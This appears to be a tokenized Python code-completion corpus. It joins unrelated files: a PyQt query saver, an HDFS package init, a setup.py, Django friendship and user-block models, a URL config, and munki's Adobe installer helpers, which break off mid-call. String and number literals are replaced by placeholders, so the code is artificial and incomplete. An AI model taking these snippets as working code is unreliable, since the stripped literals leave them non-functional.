setText ( sql ) <EOL> def saveAsDialog ( self ) : <EOL> filename = QtGui . QFileDialog . getSaveFileName ( self , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if filename : <EOL> self . filename = filename <EOL> self . saveQuery ( self . filename ) <EOL> def save ( self ) : <EOL> if not self . filename : <EOL> self . saveAsDialog ( ) <EOL> else : <EOL> self . saveQuery ( self . filename ) <EOL> def saveQuery ( self , filename ) : <EOL> if filename . endswith ( "<STR_LIT>" ) : <EOL> opener = GzipFile <EOL> elif filename . endswith ( "<STR_LIT>" ) : <EOL> opener = BZ2File <EOL> elif filename . endswith ( "<STR_LIT>" ) : <EOL> opener = ZipFile <EOL> else : <EOL> opener = open <EOL> with codecs . EncodedFile ( opener ( self . filename , "<STR_LIT:w>" ) , "<STR_LIT:utf-8>" ) as f : <EOL> f . write ( self . text ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from . client import Client , InsecureClient , TokenClient <EOL> from . config import Config , NullHandler <EOL> from . util import HdfsError <EOL> import logging as lg <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> lg . getLogger ( __name__ ) . addHandler ( NullHandler ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from . api import API <EOL> from . orm import ORM </s>
<s> try : <EOL> from setuptools . core import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> platforms = '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from django . db import models <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . contrib . auth . models import User <EOL> import signals <EOL> class FriendshipRequest ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> from_user = models . ForeignKey ( User , related_name = "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> to_user = models . ForeignKey ( User , related_name = "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> message = models . CharField ( max_length = <NUM_LIT:200> , blank = True ) <EOL> """<STR_LIT>""" <EOL> created = models . DateTimeField ( default = datetime . datetime . now , <EOL> editable = False ) <EOL> """<STR_LIT>""" <EOL> accepted = models . BooleanField ( default = False ) <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> verbose_name = _ ( u'<STR_LIT>' ) <EOL> verbose_name_plural = _ ( u'<STR_LIT>' ) <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> def __unicode__ ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { <EOL> '<STR_LIT>' : unicode ( self . from_user ) , <EOL> '<STR_LIT>' : unicode ( self . to_user ) , <EOL> } <EOL> def accept ( self ) : <EOL> """<STR_LIT>""" <EOL> Friendship . objects . befriend ( self . from_user , self . to_user ) <EOL> self . accepted = True <EOL> self . save ( ) <EOL> signals . friendship_accepted . send ( sender = self ) <EOL> def decline ( self ) : <EOL> """<STR_LIT>""" <EOL> signals . friendship_declined . send ( sender = self ) <EOL> self . delete ( ) <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> signals . friendship_cancelled . send ( sender = self ) <EOL> self . delete ( ) <EOL> class FriendshipManager ( models . Manager ) : <EOL> def friends_of ( self , user , shuffle = False ) : <EOL> """<STR_LIT>""" <EOL> qs = User . objects . filter ( friendship__friends__user = user ) <EOL> if shuffle : <EOL> qs = qs . 
order_by ( '<STR_LIT:?>' ) <EOL> return qs <EOL> def are_friends ( self , user1 , user2 ) : <EOL> """<STR_LIT>""" <EOL> friendship = Friendship . objects . get ( user = user1 ) <EOL> return bool ( friendship . friends . filter ( user = user2 ) . exists ( ) ) <EOL> def befriend ( self , user1 , user2 ) : <EOL> """<STR_LIT>""" <EOL> friendship = Friendship . objects . get ( user = user1 ) <EOL> friendship . friends . add ( Friendship . objects . get ( user = user2 ) ) <EOL> FriendshipRequest . objects . filter ( from_user = user1 , <EOL> to_user = user2 ) . delete ( ) <EOL> def unfriend ( self , user1 , user2 ) : <EOL> """<STR_LIT>""" <EOL> friendship = Friendship . objects . get ( user = user1 ) <EOL> friendship . friends . remove ( Friendship . objects . get ( user = user2 ) ) <EOL> FriendshipRequest . objects . filter ( from_user = user1 , <EOL> to_user = user2 ) . delete ( ) <EOL> FriendshipRequest . objects . filter ( from_user = user2 , <EOL> to_user = user1 ) . delete ( ) <EOL> class Friendship ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> user = models . OneToOneField ( User , related_name = '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> friends = models . ManyToManyField ( '<STR_LIT>' , symmetrical = True ) <EOL> """<STR_LIT>""" <EOL> objects = FriendshipManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( u'<STR_LIT>' ) <EOL> verbose_name_plural = _ ( u'<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { '<STR_LIT:user>' : unicode ( self . user ) } <EOL> def friend_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . friends . count ( ) <EOL> friend_count . short_description = _ ( u'<STR_LIT>' ) <EOL> def friend_summary ( self , count = <NUM_LIT:7> ) : <EOL> """<STR_LIT>""" <EOL> friend_list = self . friends . all ( ) . select_related ( depth = <NUM_LIT:1> ) [ : count ] <EOL> return u'<STR_LIT>' % ( u'<STR_LIT:U+002CU+0020>' . join ( unicode ( f . user ) for f in friend_list ) , <EOL> u'<STR_LIT>' if self . 
friend_count ( ) > count else u'<STR_LIT>' ) <EOL> friend_summary . short_description = _ ( u'<STR_LIT>' ) <EOL> class UserBlocks ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> user = models . OneToOneField ( User , related_name = '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> blocks = models . ManyToManyField ( User , related_name = '<STR_LIT>' ) <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> verbose_name = verbose_name_plural = _ ( u'<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { '<STR_LIT:user>' : unicode ( self . user ) } <EOL> def block_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . blocks . count ( ) <EOL> block_count . short_description = _ ( u'<STR_LIT>' ) <EOL> def block_summary ( self , count = <NUM_LIT:7> ) : <EOL> """<STR_LIT>""" <EOL> block_list = self . blocks . all ( ) [ : count ] <EOL> return u'<STR_LIT>' % ( u'<STR_LIT:U+002CU+0020>' . join ( unicode ( user ) for user in block_list ) , <EOL> u'<STR_LIT>' if self . block_count ( ) > count else u'<STR_LIT>' ) <EOL> block_summary . short_description = _ ( u'<STR_LIT>' ) <EOL> models . signals . post_save . connect ( <EOL> signals . create_friendship_instance , <EOL> sender = User , <EOL> dispatch_uid = '<STR_LIT>' , <EOL> ) <EOL> models . signals . post_save . connect ( <EOL> signals . create_userblocks_instance , <EOL> sender = User , <EOL> dispatch_uid = '<STR_LIT>' , <EOL> ) </s>
<s> try : <EOL> from django . conf . urls import url <EOL> except ImportError : <EOL> from django . conf . urls . defaults import url <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . trace , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . trace , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . tree , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . index , name = '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import subprocess <EOL> import time <EOL> import tempfile <EOL> import sqlite3 <EOL> from xml . dom import minidom <EOL> from glob import glob <EOL> import FoundationPlist <EOL> import munkicommon <EOL> import munkistatus <EOL> import utils <EOL> class AdobeInstallProgressMonitor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , kind = '<STR_LIT>' , operation = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> self . kind = kind <EOL> self . operation = operation <EOL> self . payload_count = { } <EOL> def get_current_log ( self ) : <EOL> '''<STR_LIT>''' <EOL> logpath = '<STR_LIT>' <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , logpath ] , <EOL> bufsize = - <NUM_LIT:1> , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( output , dummy_err ) = proc . communicate ( ) <EOL> if output : <EOL> firstitem = str ( output ) . splitlines ( ) [ <NUM_LIT:0> ] <EOL> if firstitem . endswith ( "<STR_LIT>" ) : <EOL> return os . path . join ( logpath , firstitem ) <EOL> return None <EOL> def info ( self ) : <EOL> '''<STR_LIT>''' <EOL> last_adobecode = "<STR_LIT>" <EOL> logfile = self . get_current_log ( ) <EOL> if logfile : <EOL> if self . kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> regex = r'<STR_LIT>' <EOL> elif self . kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if self . operation == '<STR_LIT>' : <EOL> regex = r'<STR_LIT>' <EOL> else : <EOL> regex = r'<STR_LIT>' <EOL> else : <EOL> if self . operation == '<STR_LIT>' : <EOL> regex = r'<STR_LIT>' <EOL> else : <EOL> regex = r'<STR_LIT>' <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , regex , logfile ] <EOL> proc = subprocess . Popen ( cmd , bufsize = - <NUM_LIT:1> , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( output , dummy_err ) = proc . communicate ( ) <EOL> if output : <EOL> lines = str ( output ) . splitlines ( ) <EOL> completed_payloads = len ( lines ) <EOL> if ( not logfile in self . 
payload_count <EOL> or completed_payloads > self . payload_count [ logfile ] ) : <EOL> self . payload_count [ logfile ] = completed_payloads <EOL> regex = re . compile ( r'<STR_LIT>' ) <EOL> lines . reverse ( ) <EOL> for line in lines : <EOL> m = regex . match ( line ) <EOL> try : <EOL> last_adobecode = m . group ( <NUM_LIT:1> ) <EOL> break <EOL> except ( IndexError , AttributeError ) : <EOL> pass <EOL> total_completed_payloads = <NUM_LIT:0> <EOL> for key in self . payload_count . keys ( ) : <EOL> total_completed_payloads += self . payload_count [ key ] <EOL> return ( total_completed_payloads , last_adobecode ) <EOL> def mountAdobeDmg ( dmgpath ) : <EOL> """<STR_LIT>""" <EOL> mountpoints = [ ] <EOL> dmgname = os . path . basename ( dmgpath ) <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , dmgpath , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> bufsize = - <NUM_LIT:1> , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> ( pliststr , err ) = proc . communicate ( ) <EOL> if err : <EOL> munkicommon . display_error ( '<STR_LIT>' % ( err , dmgname ) ) <EOL> if pliststr : <EOL> plist = FoundationPlist . readPlistFromString ( pliststr ) <EOL> for entity in plist [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' in entity : <EOL> mountpoints . append ( entity [ '<STR_LIT>' ] ) <EOL> return mountpoints <EOL> def getCS5uninstallXML ( optionXMLfile ) : <EOL> '''<STR_LIT>''' <EOL> xml = '<STR_LIT>' <EOL> dom = minidom . parse ( optionXMLfile ) <EOL> DeploymentInfo = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if DeploymentInfo : <EOL> for info_item in DeploymentInfo : <EOL> DeploymentUninstall = info_item . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if DeploymentUninstall : <EOL> deploymentData = DeploymentUninstall [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if deploymentData : <EOL> Deployment = deploymentData [ <NUM_LIT:0> ] <EOL> xml += Deployment . 
toxml ( '<STR_LIT>' ) <EOL> return xml <EOL> def getCS5mediaSignature ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> payloads_dir = "<STR_LIT>" <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> payloads_dir = path <EOL> if not payloads_dir : <EOL> return '<STR_LIT>' <EOL> setupxml = os . path . join ( payloads_dir , '<STR_LIT>' ) <EOL> if os . path . exists ( setupxml ) and os . path . isfile ( setupxml ) : <EOL> dom = minidom . parse ( setupxml ) <EOL> setupElements = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if setupElements : <EOL> mediaSignatureElements = setupElements [ <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if mediaSignatureElements : <EOL> element = mediaSignatureElements [ <NUM_LIT:0> ] <EOL> elementvalue = '<STR_LIT>' <EOL> for node in element . childNodes : <EOL> elementvalue += node . nodeValue <EOL> return elementvalue <EOL> return "<STR_LIT>" <EOL> def getPayloadInfo ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> payloadinfo = { } <EOL> if os . path . isdir ( dirpath ) : <EOL> proxy_paths = glob ( os . path . join ( dirpath , '<STR_LIT>' ) ) <EOL> if proxy_paths : <EOL> xmlpath = proxy_paths [ <NUM_LIT:0> ] <EOL> dom = minidom . parse ( xmlpath ) <EOL> else : <EOL> db_path = os . path . join ( dirpath , '<STR_LIT>' ) <EOL> if os . path . exists ( db_path ) : <EOL> conn = sqlite3 . connect ( db_path ) <EOL> cur = conn . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> result = cur . fetchone ( ) <EOL> cur . close ( ) <EOL> if result : <EOL> info_xml = result [ <NUM_LIT:0> ] . encode ( '<STR_LIT>' ) <EOL> dom = minidom . parseString ( info_xml ) <EOL> else : <EOL> return payloadinfo <EOL> payload_info = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if payload_info : <EOL> installer_properties = payload_info [ <NUM_LIT:0> ] . 
getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if installer_properties : <EOL> properties = installer_properties [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> for prop in properties : <EOL> if '<STR_LIT:name>' in prop . attributes . keys ( ) : <EOL> propname = prop . attributes [ '<STR_LIT:name>' ] . value . encode ( '<STR_LIT>' ) <EOL> propvalue = '<STR_LIT>' <EOL> for node in prop . childNodes : <EOL> propvalue += node . nodeValue <EOL> if propname == '<STR_LIT>' : <EOL> payloadinfo [ '<STR_LIT>' ] = propvalue <EOL> if propname == '<STR_LIT>' : <EOL> payloadinfo [ '<STR_LIT>' ] = propvalue <EOL> if propname == '<STR_LIT>' : <EOL> payloadinfo [ '<STR_LIT:version>' ] = propvalue <EOL> installmetadata = payload_info [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if installmetadata : <EOL> totalsizes = installmetadata [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> '<STR_LIT>' ) <EOL> if totalsizes : <EOL> installsize = '<STR_LIT>' <EOL> for node in totalsizes [ <NUM_LIT:0> ] . childNodes : <EOL> installsize += node . nodeValue <EOL> payloadinfo [ '<STR_LIT>' ] = int ( installsize ) / <NUM_LIT> <EOL> return payloadinfo <EOL> def getAdobeSetupInfo ( installroot ) : <EOL> '''<STR_LIT>''' <EOL> info = { } <EOL> payloads = [ ] <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( installroot ) : <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> driverfolder = '<STR_LIT>' <EOL> mediaSignature = '<STR_LIT>' <EOL> setupxml = os . path . join ( path , '<STR_LIT>' ) <EOL> if os . path . exists ( setupxml ) : <EOL> dom = minidom . parse ( setupxml ) <EOL> drivers = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if drivers : <EOL> driver = drivers [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in driver . attributes . keys ( ) : <EOL> driverfolder = driver . attributes [ <EOL> '<STR_LIT>' ] . value . encode ( '<STR_LIT>' ) <EOL> if driverfolder == '<STR_LIT>' : <EOL> setupElements = dom . 
getElementsByTagName ( '<STR_LIT>' ) <EOL> if setupElements : <EOL> mediaSignatureElements = setupElements [ <EOL> <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if mediaSignatureElements : <EOL> element = mediaSignatureElements [ <NUM_LIT:0> ] <EOL> for node in element . childNodes : <EOL> mediaSignature += node . nodeValue <EOL> for item in munkicommon . listdir ( path ) : <EOL> payloadpath = os . path . join ( path , item ) <EOL> payloadinfo = getPayloadInfo ( payloadpath ) <EOL> if payloadinfo : <EOL> payloads . append ( payloadinfo ) <EOL> if ( ( driverfolder and item == driverfolder ) or <EOL> ( mediaSignature and <EOL> payloadinfo [ '<STR_LIT>' ] == mediaSignature ) ) : <EOL> info [ '<STR_LIT>' ] = payloadinfo [ '<STR_LIT>' ] <EOL> info [ '<STR_LIT:version>' ] = payloadinfo [ '<STR_LIT:version>' ] <EOL> info [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not payloads : <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( installroot ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> for item in munkicommon . listdir ( path ) : <EOL> if item . find ( "<STR_LIT>" ) == - <NUM_LIT:1> : <EOL> itempath = os . path . join ( path , item ) <EOL> payloadinfo = getPayloadInfo ( itempath ) <EOL> if payloadinfo : <EOL> payloads . append ( payloadinfo ) <EOL> break <EOL> if payloads : <EOL> if len ( payloads ) == <NUM_LIT:1> : <EOL> info [ '<STR_LIT>' ] = payloads [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> info [ '<STR_LIT:version>' ] = payloads [ <NUM_LIT:0> ] [ '<STR_LIT:version>' ] <EOL> else : <EOL> if not '<STR_LIT>' in info : <EOL> info [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if not '<STR_LIT:version>' in info : <EOL> info [ '<STR_LIT:version>' ] = "<STR_LIT>" <EOL> info [ '<STR_LIT>' ] = payloads <EOL> installed_size = <NUM_LIT:0> <EOL> for payload in payloads : <EOL> installed_size = installed_size + payload . 
get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> info [ '<STR_LIT>' ] = installed_size <EOL> return info <EOL> def getAdobePackageInfo ( installroot ) : <EOL> '''<STR_LIT>''' <EOL> info = getAdobeSetupInfo ( installroot ) <EOL> info [ '<STR_LIT:description>' ] = "<STR_LIT>" <EOL> installerxml = os . path . join ( installroot , "<STR_LIT>" ) <EOL> if os . path . exists ( installerxml ) : <EOL> description = '<STR_LIT>' <EOL> dom = minidom . parse ( installerxml ) <EOL> installinfo = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> if installinfo : <EOL> packagedescriptions = installinfo [ <NUM_LIT:0> ] . getElementsByTagName ( "<STR_LIT>" ) <EOL> if packagedescriptions : <EOL> prop = packagedescriptions [ <NUM_LIT:0> ] <EOL> for node in prop . childNodes : <EOL> description += node . nodeValue <EOL> if description : <EOL> description_parts = description . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> info [ '<STR_LIT>' ] = description_parts [ <NUM_LIT:0> ] <EOL> if len ( description_parts ) > <NUM_LIT:1> : <EOL> info [ '<STR_LIT:description>' ] = description_parts [ <NUM_LIT:1> ] <EOL> else : <EOL> info [ '<STR_LIT:description>' ] = "<STR_LIT>" <EOL> return info <EOL> else : <EOL> installerxml = os . path . join ( installroot , "<STR_LIT>" ) <EOL> if os . path . exists ( installerxml ) : <EOL> dom = minidom . parse ( installerxml ) <EOL> installinfo = dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> if installinfo : <EOL> pkgname_elems = installinfo [ <NUM_LIT:0> ] . getElementsByTagName ( <EOL> "<STR_LIT>" ) <EOL> if pkgname_elems : <EOL> prop = pkgname_elems [ <NUM_LIT:0> ] <EOL> pkgname = "<STR_LIT>" <EOL> for node in prop . childNodes : <EOL> pkgname += node . nodeValue <EOL> info [ '<STR_LIT>' ] = pkgname <EOL> if not info . get ( '<STR_LIT>' ) : <EOL> info [ '<STR_LIT>' ] = os . path . basename ( installroot ) <EOL> return info <EOL> def getXMLtextElement ( dom_node , name ) : <EOL> '''<STR_LIT>''' <EOL> value = None <EOL> subelements = dom_node . 
getElementsByTagName ( name ) <EOL> if subelements : <EOL> value = '<STR_LIT>' <EOL> for node in subelements [ <NUM_LIT:0> ] . childNodes : <EOL> value += node . nodeValue <EOL> return value <EOL> def parseOptionXML ( option_xml_file ) : <EOL> '''<STR_LIT>''' <EOL> info = { } <EOL> dom = minidom . parse ( option_xml_file ) <EOL> installinfo = dom . getElementsByTagName ( '<STR_LIT>' ) <EOL> if installinfo : <EOL> if '<STR_LIT:id>' in installinfo [ <NUM_LIT:0> ] . attributes . keys ( ) : <EOL> info [ '<STR_LIT>' ] = installinfo [ <NUM_LIT:0> ] . attributes [ '<STR_LIT:id>' ] . value <EOL> if '<STR_LIT:version>' in installinfo [ <NUM_LIT:0> ] . attributes . keys ( ) : <EOL> info [ '<STR_LIT>' ] = installinfo [ <EOL> <NUM_LIT:0> ] . attributes [ '<STR_LIT:version>' ] . value <EOL> info [ '<STR_LIT>' ] = getXMLtextElement ( installinfo [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> info [ '<STR_LIT>' ] = getXMLtextElement ( installinfo [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> info [ '<STR_LIT>' ] = [ ] <EOL> medias_elements = installinfo [ <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if medias_elements : <EOL> media_elements = medias_elements [ <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if media_elements : <EOL> for media in media_elements : <EOL> product = { } <EOL> product [ '<STR_LIT>' ] = getXMLtextElement ( media , '<STR_LIT>' ) <EOL> product [ '<STR_LIT>' ] = getXMLtextElement ( <EOL> media , '<STR_LIT>' ) <EOL> setup_elements = media . getElementsByTagName ( '<STR_LIT>' ) <EOL> if setup_elements : <EOL> mediaSignatureElements = setup_elements [ <EOL> <NUM_LIT:0> ] . getElementsByTagName ( '<STR_LIT>' ) <EOL> if mediaSignatureElements : <EOL> product [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> element = mediaSignatureElements [ <NUM_LIT:0> ] <EOL> for node in element . childNodes : <EOL> product [ '<STR_LIT>' ] += node . nodeValue <EOL> info [ '<STR_LIT>' ] . 
append ( product ) <EOL> return info <EOL> def countPayloads ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> count = <NUM_LIT:0> <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> for subitem in munkicommon . listdir ( path ) : <EOL> subitempath = os . path . join ( path , subitem ) <EOL> if os . path . isdir ( subitempath ) : <EOL> count = count + <NUM_LIT:1> <EOL> return count <EOL> def getPercent ( current , maximum ) : <EOL> '''<STR_LIT>''' <EOL> if maximum == <NUM_LIT:0> : <EOL> percentdone = - <NUM_LIT:1> <EOL> elif current < <NUM_LIT:0> : <EOL> percentdone = - <NUM_LIT:1> <EOL> elif current > maximum : <EOL> percentdone = - <NUM_LIT:1> <EOL> elif current == maximum : <EOL> percentdone = <NUM_LIT:100> <EOL> else : <EOL> percentdone = int ( float ( current ) / float ( maximum ) * <NUM_LIT:100> ) <EOL> return percentdone <EOL> def findSetupApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> setup_path = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_path ) : <EOL> return setup_path <EOL> return '<STR_LIT>' <EOL> def findInstallApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> setup_path = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_path ) : <EOL> return setup_path <EOL> return '<STR_LIT>' <EOL> def findAdobePatchInstallerApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> setup_path = os . path . join ( <EOL> path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . 
exists ( setup_path ) : <EOL> return setup_path <EOL> return '<STR_LIT>' <EOL> def findAdobeDeploymentManager ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> dm_path = os . path . join ( path , "<STR_LIT>" ) <EOL> if os . path . exists ( dm_path ) : <EOL> return dm_path <EOL> return '<STR_LIT>' <EOL> secondsToLive = { } <EOL> def killStupidProcesses ( ) : <EOL> '''<STR_LIT>''' <EOL> stupid_processes = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] <EOL> for procname in stupid_processes : <EOL> pid = utils . getPIDforProcessName ( procname ) <EOL> if pid : <EOL> if not pid in secondsToLive : <EOL> secondsToLive [ pid ] = <NUM_LIT:30> <EOL> else : <EOL> secondsToLive [ pid ] = secondsToLive [ pid ] - <NUM_LIT:1> <EOL> if secondsToLive [ pid ] == <NUM_LIT:0> : <EOL> munkicommon . log ( "<STR_LIT>" % ( pid , procname ) ) <EOL> try : <EOL> os . kill ( int ( pid ) , <NUM_LIT:9> ) <EOL> except OSError : <EOL> pass <EOL> del secondsToLive [ pid ] <EOL> return <EOL> def runAdobeInstallTool ( <EOL> cmd , number_of_payloads = <NUM_LIT:0> , killAdobeAIR = False , payloads = None , <EOL> kind = "<STR_LIT>" , operation = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> progress_monitor = AdobeInstallProgressMonitor ( <EOL> kind = kind , operation = operation ) <EOL> if munkicommon . munkistatusoutput and not number_of_payloads : <EOL> munkistatus . percent ( - <NUM_LIT:1> ) <EOL> proc = subprocess . Popen ( cmd , shell = False , bufsize = <NUM_LIT:1> , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , stderr = subprocess . STDOUT ) <EOL> old_payload_completed_count = <NUM_LIT:0> <EOL> payloadname = "<STR_LIT>" <EOL> while proc . poll ( ) == None : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> ( payload_completed_count , adobe_code ) = progress_monitor . 
info ( ) <EOL> if payload_completed_count > old_payload_completed_count : <EOL> old_payload_completed_count = payload_completed_count <EOL> if adobe_code and payloads : <EOL> matched_payloads = [ payload for payload in payloads <EOL> if payload . get ( '<STR_LIT>' ) == adobe_code ] <EOL> if matched_payloads : <EOL> payloadname = matched_payloads [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) <EOL> else : <EOL> payloadname = adobe_code <EOL> payloadinfo = "<STR_LIT>" + payloadname <EOL> else : <EOL> payloadinfo = "<STR_LIT>" <EOL> if number_of_payloads : <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % <EOL> ( payload_completed_count , number_of_payloads , <EOL> payloadinfo ) ) <EOL> else : <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' , <EOL> payload_completed_count , payloadinfo ) <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( <EOL> getPercent ( payload_completed_count , number_of_payloads ) ) <EOL> if killAdobeAIR : <EOL> if ( not munkicommon . getconsoleuser ( ) or <EOL> munkicommon . getconsoleuser ( ) == u"<STR_LIT>" ) : <EOL> killStupidProcesses ( ) <EOL> retcode = proc . poll ( ) <EOL> output = proc . stdout . readlines ( ) <EOL> for line in output : <EOL> line = line . rstrip ( "<STR_LIT:\n>" ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> munkicommon . display_error ( line ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> if retcode == <NUM_LIT:0> : <EOL> try : <EOL> retcode = int ( line [ <NUM_LIT:11> : ] ) <EOL> except ( ValueError , TypeError ) : <EOL> retcode = - <NUM_LIT:1> <EOL> if retcode != <NUM_LIT:0> and retcode != <NUM_LIT:8> : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , retcode , adobeSetupError ( retcode ) ) <EOL> else : <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( <NUM_LIT:100> ) <EOL> munkicommon . 
